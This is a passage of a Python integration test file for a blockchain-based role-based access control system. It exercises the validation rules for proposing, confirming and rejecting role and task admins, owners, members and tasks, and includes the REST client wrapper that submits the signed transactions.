proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=uuid4().hex,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The user must exist")
self.assertEqual(
self.client.propose_add_role_owners(
key=self.key1,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be the user or user's manager.")
self.assertEqual(
self.client.propose_add_role_owners(
key=self.key2b,
proposal_id=self.add_role_owners_proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_add_role_owners(
key=self.key2b,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"No open proposal can exist for the same state change.")
def test_09_confirm_add_role_owners(self):
"""Tests the ConfirmAddRoleOwners validation rules.
Notes:
ConfirmAddRoleOwners validation rules
- The proposal exists and is open.
- The txn signer is a Role admin.
At this point:
user1 role1
\ \
user2b admins
/ \ - user1
/ user2a - user2a
user3b \ - user3a
user3a
"""
self.assertEqual(
self.client.confirm_add_role_owners(
key=self.key2b,
proposal_id=self.add_role_admins_proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer for ConfirmAddRoleOwner must be an admin "
"of the role.")
self.assertEqual(
self.client.confirm_add_role_owners(
key=self.key1,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=uuid4().hex,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.confirm_add_role_owners(
key=self.key3a,
proposal_id=self.add_role_owners_proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.confirm_add_role_owners(
key=self.key3a,
proposal_id=self.add_role_admins_proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_10_reject_add_role_owners(self):
"""Tests the RejectAddRoleOwners validation rules.
Notes:
RejectAddRoleOwners validation rules
- The txn signer is an admin of the Role
- The proposal exists and is open.
"""
proposal_id = uuid4().hex
self.assertEqual(
self.client.propose_add_role_owners(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_owners(
key=self.key3b,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer is not a Role Admin.")
self.assertEqual(
self.client.reject_add_role_owners(
key=self.key1,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=uuid4().hex,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.reject_add_role_owners(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_owners(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_11_propose_add_role_members(self):
"""Tests the ProposeAddRoleMembers validation rules.
Notes:
ProposeAddRoleMembers validation rules
- The Role exists.
- The User exists.
- The txn signer is either the User or the User's manager.
- No open proposal exists for the same change.
- The User is not already a Member of the Role.
At this point:
user1 role1
\ / \
user2b owners admins
/ \ - user3b - user1
/ user2a - user2a
user3b \ - user3a
user3a
"""
self.assertEqual(
self.client.propose_add_role_members(
key=self.key2b,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The role must exist.")
self.assertEqual(
self.client.propose_add_role_members(
key=self.key2b,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=uuid4().hex,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The user must exist")
self.assertEqual(
self.client.propose_add_role_members(
key=self.key1,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be the user or user's manager.")
self.assertEqual(
self.client.propose_add_role_members(
key=self.key1,
proposal_id=self.add_role_members_proposal_id,
role_id=self.role_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_add_role_members(
key=self.key1,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"No open proposal can exist for the same state change.")
def test_12_confirm_add_role_members(self):
"""Tests the ConfirmAddRoleMembers validation rules.
Notes:
ConfirmAddRoleMembers validation rules
- The proposal exists and is open.
- The txn signer is a Role owner.
"""
self.assertEqual(
self.client.confirm_add_role_members(
key=self.key1,
proposal_id=self.add_role_members_proposal_id,
role_id=self.role_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer for ConfirmAddRoleMember must be an owner "
"of the role.")
self.assertEqual(
self.client.confirm_add_role_members(
key=self.key3b,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=uuid4().hex,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.confirm_add_role_members(
key=self.key3b,
proposal_id=self.add_role_members_proposal_id,
role_id=self.role_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.confirm_add_role_members(
key=self.key3b,
proposal_id=self.add_role_members_proposal_id,
role_id=self.role_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_13_reject_add_role_members(self):
"""Tests the RejectAddRoleMembers validation rules.
Notes:
RejectAddRoleMembers validation rules
- The txn signer is an owner of the Role
- The proposal exists and is open.
"""
proposal_id = uuid4().hex
self.assertEqual(
self.client.propose_add_role_members(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_members(
key=self.key2a,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer is not a Role Owner.")
self.assertEqual(
self.client.reject_add_role_members(
key=self.key3b,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=uuid4().hex,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.reject_add_role_members(
key=self.key3b,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_members(
key=self.key3b,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_14_create_task(self):
"""Tests the CreateTask validation rules.
Notes:
CreateTask validation rules
- The admins listed are users.
- The task_id is not used already.
"""
self.assertEqual(
self.client.create_task(
key=self.key1,
task_id=uuid4().hex,
task_name=uuid4().hex,
admins=[uuid4().hex],
owners=[self.key1.public_key],
metadata=uuid4().hex)[0]['status'],
"INVALID",
"All admins must be users.")
self.assertEqual(
self.client.create_task(
key=self.key1,
task_id=uuid4().hex,
task_name=uuid4().hex,
admins=[self.key1.public_key],
owners=[uuid4().hex],
metadata=uuid4().hex)[0]['status'],
"INVALID",
"All owners must be users")
self.assertEqual(
self.client.create_task(
key=self.key1,
task_id=self.task_id1,
task_name=uuid4().hex,
admins=[self.key1.public_key],
owners=[self.key2a.public_key],
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.create_task(
key=self.key1,
task_id=self.task_id1,
task_name=uuid4().hex,
admins=[self.key1.public_key],
owners=[self.key1.public_key],
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The task_id must not belong to another task.")
def test_15_propose_add_role_tasks(self):
"""Tests the ProposeAddRoleTasks validation rules.
Notes:
ProposeAddRoleTask validation rules
- The txn is signed by a role owner.
- The Role exists.
- THe Task exists.
- The Task isn't already part of the Role.
- No open proposal exists for the same change.
"""
self.assertEqual(
self.client.propose_add_role_tasks(
key=self.key1,
proposal_id=str(uuid4()),
role_id=self.role_id1,
task_id=self.task_id1,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be a Role Owner")
self.assertEqual(
self.client.propose_add_role_tasks(
key=self.key3b,
proposal_id=str(uuid4()),
role_id=str(uuid4()),
task_id=self.task_id1,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The role must exist.")
self.assertEqual(
self.client.propose_add_role_tasks(
key=self.key3b,
proposal_id=str(uuid4()),
role_id=str(uuid4()),
task_id=self.task_id1,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The task must exist.")
self.assertEqual(
self.client.propose_add_role_tasks(
key=self.key3b,
proposal_id=self.add_role_tasks_proposal_id,
role_id=self.role_id1,
task_id=self.task_id1,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_add_role_tasks(
key=self.key3b,
proposal_id=str(uuid4()),
role_id=self.role_id1,
task_id=self.task_id1,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"No Proposal for the same Add Role Task can exist.")
def test_16_confirm_add_role_tasks(self):
"""Tests the ConfirmAddRoleTasks validation rules.
Notes:
ConfirmAddRoleTasks validation rules
- The Proposal exists and is open.
- The txn signer is an Owner of the Task
"""
self.assertEqual(
self.client.confirm_add_role_tasks(
key=self.key2a,
proposal_id=str(uuid4()),
role_id=self.role_id1,
task_id=self.task_id1,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.confirm_add_role_tasks(
key=self.key1,
proposal_id=self.add_role_tasks_proposal_id,
role_id=self.role_id1,
task_id=self.task_id1,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be a Task Owner.")
self.assertEqual(
self.client.confirm_add_role_tasks(
key=self.key2a,
proposal_id=self.add_role_tasks_proposal_id,
role_id=self.role_id1,
task_id=self.task_id1,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.confirm_add_role_tasks(
key=self.key2a,
proposal_id=self.add_role_tasks_proposal_id,
role_id=self.role_id1,
task_id=self.task_id1,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_17_reject_add_role_tasks(self):
"""Tests the RejectAddRoleTasks validation rules.
Notes:
RejectAddRoleTasks validation rules
- The Proposal exists and is open.
- The txn signer is an Owner of the Task
"""
proposal_id = str(uuid4())
task_id = str(uuid4())
self.assertEqual(
self.client.create_task(
self.key1,
task_id=task_id,
task_name=uuid4().hex,
admins=[self.key1.public_key],
owners=[self.key1.public_key],
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_add_role_tasks(
key=self.key3b,
proposal_id=proposal_id,
role_id=self.role_id1,
task_id=task_id,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_tasks(
key=self.key1,
proposal_id=str(uuid4()),
role_id=self.role_id1,
task_id=task_id,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.reject_add_role_tasks(
key=self.key2a,
proposal_id=proposal_id,
role_id=self.role_id1,
task_id=task_id,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be a Task Owner.")
self.assertEqual(
self.client.reject_add_role_tasks(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
task_id=task_id,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_tasks(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
task_id=task_id,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_18_propose_add_task_admins(self):
"""Tests the ProposeAddTaskAdmins validation rules.
Notes:
ProposeAddTaskAdmins validation rules.
- The Task exists
- The User exists
- The txn signer is the User or the User's manager.
- No open proposal exists for the same change.
- The user is not already an Admin of the Task.
"""
self.assertEqual(
self.client.propose_add_task_admins(
key=self.key1,
proposal_id=str(uuid4()),
task_id=str(uuid4()),
user_id=self.key2b.public_key,
reason=str(uuid4()),
metadata=str(uuid4()))[0]['status'],
"INVALID",
"The Task must exist.")
self.assertEqual(
self.client.propose_add_task_admins(
key=self.key_invalid,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key_invalid.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The user must exist")
self.assertEqual(
self.client.propose_add_task_admins(
key=self.key1,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key3a.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be the user or user's manager")
self.assertEqual(
self.client.propose_add_task_admins(
key=self.key2b,
proposal_id=self.add_task_admins_proposal_id,
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_add_task_admins(
key=self.key2b,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The must not be any open proposal for the same change.")
def test_19_confirm_add_task_admins(self):
"""Tests the ConfirmAddTaskAdmins validation rules
Notes
ConfirmAddTaskAdmins validation rules
- The proposal exists and is open.
- The txn signer is a Task Admin.
"""
self.assertEqual(
self.client.confirm_add_task_admins(
key=self.key1,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.confirm_add_task_admins(
key=self.key1,
proposal_id=self.add_task_admins_proposal_id,
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.confirm_add_task_admins(
key=self.key1,
proposal_id=self.add_task_admins_proposal_id,
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_20_reject_add_task_admins(self):
"""Tests the RejectAddTaskAdmins validation rules
Notes
RejectAddTaskAdmins validation rules
- The proposal exists and is open.
- The txn signer is a Task Admin.
"""
proposal_id = str(uuid4())
self.assertEqual(
self.client.propose_add_task_admins(
key=self.key2b,
proposal_id=proposal_id,
task_id=self.task_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_task_admins(
key=self.key1,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.reject_add_task_admins(
key=self.key1,
proposal_id=proposal_id,
task_id=self.task_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_task_admins(
key=self.key1,
proposal_id=proposal_id,
task_id=self.task_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_21_propose_add_task_owners(self):
"""Tests the ProposeAddTaskOwners validation rules
Notes:
ProposeAddTaskOwners
- The Task exists
- The User exists
- No open proposal exists for the same change.
- The txn signer is the user or the Users manager.
- The User is not already an Owner of the Task.
"""
self.assertEqual(
self.client.propose_add_task_owners(
key=self.key1,
proposal_id=str(uuid4()),
task_id=str(uuid4()),
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The Task must exist.")
self.assertEqual(
self.client.propose_add_task_owners(
key=self.key2a,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=str(uuid4()),
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The User must exist.")
self.assertEqual(
self.client.propose_add_task_owners(
key=self.key2a,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key2a.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The User must not already be an Owner of the Task")
self.assertEqual(
self.client.propose_add_task_owners(
key=self.key3a,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be the User or the Users manager.")
self.assertEqual(
self.client.propose_add_task_owners(
key=self.key1,
proposal_id=self.add_task_owners_proposal_id,
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_add_task_owners(
key=self.key1,
proposal_id=self.add_task_owners_proposal_id,
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"There must not be an OPEN proposal for the same change.")
def test_22_confirm_add_task_owners(self):
"""Tests the ConfirmAddTaskOwners validation rules
Notes
ConfirmAddTaskOwners validation rules
- The proposal exists and is open.
- The txn signer is a Task Admin.
"""
self.assertEqual(
self.client.confirm_add_task_admins(
key=self.key1,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.confirm_add_task_owners(
key=self.key1,
proposal_id=self.add_task_owners_proposal_id,
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.confirm_add_task_owners(
key=self.key1,
proposal_id=self.add_task_owners_proposal_id,
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_23_reject_add_task_owners(self):
"""Tests the RejectAddTaskOwners validation rules
Notes:
RejectAddTaskOwners validation rules
- The proposal exists and is open
- The txn signer is a Task admin
"""
proposal_id = str(uuid4())
self.assertEqual(
self.client.propose_add_task_owners(
key=self.key2b,
proposal_id=proposal_id,
task_id=self.task_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_task_owners(
key=self.key1,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.reject_add_task_owners(
key=self.key1,
proposal_id=proposal_id,
task_id=self.task_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_task_owners(
key=self.key1,
proposal_id=proposal_id,
task_id=self.task_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_24_propose_remove_task_admins(self):
"""Tests the ProposeRemoveTaskAdmins txn validation rules.
Notes:
ProposeRemoveTaskAdmins validation rules
- No open proposal for the same change exists.
- The user is an admin of the task.
- The Task exists
- The User exists.
- The txn signer is the user or the user's manager.
"""
self.assertEqual(
self.client.propose_delete_task_admins(
key=self.key1,
proposal_id=str(uuid4()),
task_id=str(uuid4()),
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The Task must exist.")
self.assertEqual(
self.client.propose_delete_task_admins(
key=self.key1,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=str(uuid4()),
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The User must exist.")
self.assertEqual(
self.client.propose_delete_task_admins(
key=self.key2a,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key2a.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The User must be an Admin of the Task.")
self.assertEqual(
self.client.propose_delete_task_admins(
key=self.key2b,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be the User or the User's Manager.")
self.assertEqual(
self.client.propose_delete_task_admins(
key=self.key1,
proposal_id=self.remove_task_admins_proposal_id,
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
def test_25_propose_remove_task_owners(self):
"""Tests the ProposeRemoveTaskOwners txn validation rules.
Notes:
ProposeRemoveTaskAdmins validation rules
- No open proposal for the same change exists.
- The user is an Owner of the task.
- The Task exists.
- The User exists.
- The txn signer is the user or the user's manager.
"""
self.assertEqual(
self.client.propose_delete_task_owners(
key=self.key1,
proposal_id=str(uuid4()),
task_id=str(uuid4()),
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The Task must exist.")
self.assertEqual(
self.client.propose_delete_task_owners(
key=self.key1,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=str(uuid4()),
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The User must exist.")
self.assertEqual(
self.client.propose_delete_task_owners(
key=self.key3b,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The User must be an Owner of the Task.")
self.assertEqual(
self.client.propose_delete_task_owners(
key=self.key2b,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be the User or the User's Manager.")
self.assertEqual(
self.client.propose_delete_task_owners(
key=self.key1,
proposal_id=self.remove_task_owners_proposal_id,
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
class RBACClient(object):
def __init__(self, url):
self._client = RestClient(base_url=url)
def return_state(self):
items = []
for item in self._client.list_state(subtree=addresser.NS)['data']:
if addresser.address_is(item['address']) == addresser.AddressSpace.USER:
user_container = user_state_pb2.UserContainer()
user_container.ParseFromString(b64decode(item['data']))
items.append((user_container, addresser.AddressSpace.USER))
return items
def create_user(self, key, name, user_name, user_id, manager_id=None):
batch_list, signature = create_user(txn_key=key,
batch_key=BATCHER_KEY,
name=name,
user_name=user_name,
user_id=user_id,
metadata=uuid4().hex,
manager_id=manager_id)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def create_role(self, key, role_name, role_id, metadata, admins, owners):
batch_list, signature = role_transaction_creation.create_role(
txn_key=key,
batch_key=BATCHER_KEY,
role_name=role_name,
role_id=role_id,
metadata=metadata,
admins=admins,
owners=owners)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_update_manager(self,
key,
proposal_id,
user_id,
new_manager_id,
reason,
metadata):
batch_list, signature = manager_transaction_creation.propose_manager(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
user_id=user_id,
new_manager_id=new_manager_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_update_manager(self,
key,
proposal_id,
reason,
user_id,
manager_id):
batch_list, signature = manager_transaction_creation.confirm_manager(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
reason=reason,
user_id=user_id,
manager_id=manager_id)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_update_manager(self,
key,
proposal_id,
reason,
user_id,
manager_id):
batch_list, signature = manager_transaction_creation.reject_manager(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
reason=reason,
user_id=user_id,
manager_id=manager_id)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_admins(self,
key,
proposal_id,
role_id,
user_id,
reason,
metadata):
batch_list, signature = role_transaction_creation.propose_add_role_admins(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_admins(self,
key,
proposal_id,
role_id,
user_id,
reason):
batch_list, signature = role_transaction_creation.confirm_add_role_admins(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_admins(self,
key,
proposal_id,
role_id,
user_id,
reason):
batch_list, signature = role_transaction_creation.reject_add_role_admins(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_owners(self,
key,
proposal_id,
role_id,
user_id,
reason,
metadata):
batch_list, signature = role_transaction_creation.propose_add_role_owners(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_owners(self,
key,
proposal_id,
role_id,
user_id,
reason):
batch_list, signature = role_transaction_creation.confirm_add_role_owners(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_owners(self,
key,
proposal_id,
role_id,
user_id,
reason):
batch_list, signature = role_transaction_creation.reject_add_role_owners(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_members(self,
key,
proposal_id,
role_id,
user_id,
reason,
metadata):
batch_list, signature = role_transaction_creation.propose_add_role_members(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_members(self,
key,
proposal_id,
role_id,
user_id,
reason):
batch_list, signature = role_transaction_creation.confirm_add_role_members(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_members(self,
key,
proposal_id,
role_id,
user_id,
reason):
batch_list, signature = role_transaction_creation.reject_add_role_members(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_tasks(self,
key,
proposal_id,
role_id,
task_id,
reason,
metadata):
batch_list, signature = role_transaction_creation.propose_add_role_tasks(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
task_id=task_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_tasks(self,
key,
proposal_id,
role_id,
task_id,
reason):
batch_list, signature = role_transaction_creation.confirm_add_role_tasks(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
task_id=task_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_tasks(self,
key,
proposal_id,
role_id,
task_id,
reason):
batch_list, signature = role_transaction_creation.reject_add_role_tasks(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
role_id=role_id,
task_id=task_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def create_task(self,
key,
task_id,
task_name,
admins,
owners,
metadata):
batch_list, signature = task_transaction_creation.create_task(
txn_key=key,
batch_key=BATCHER_KEY,
task_id=task_id,
task_name=task_name,
admins=admins,
owners=owners,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_task_admins(self,
key,
proposal_id,
task_id,
user_id,
reason,
metadata):
batch_list, signature = task_transaction_creation.propose_add_task_admins(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_task_admins(self,
key,
proposal_id,
task_id,
user_id,
reason):
batch_list, signature = task_transaction_creation.confirm_add_task_admins(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
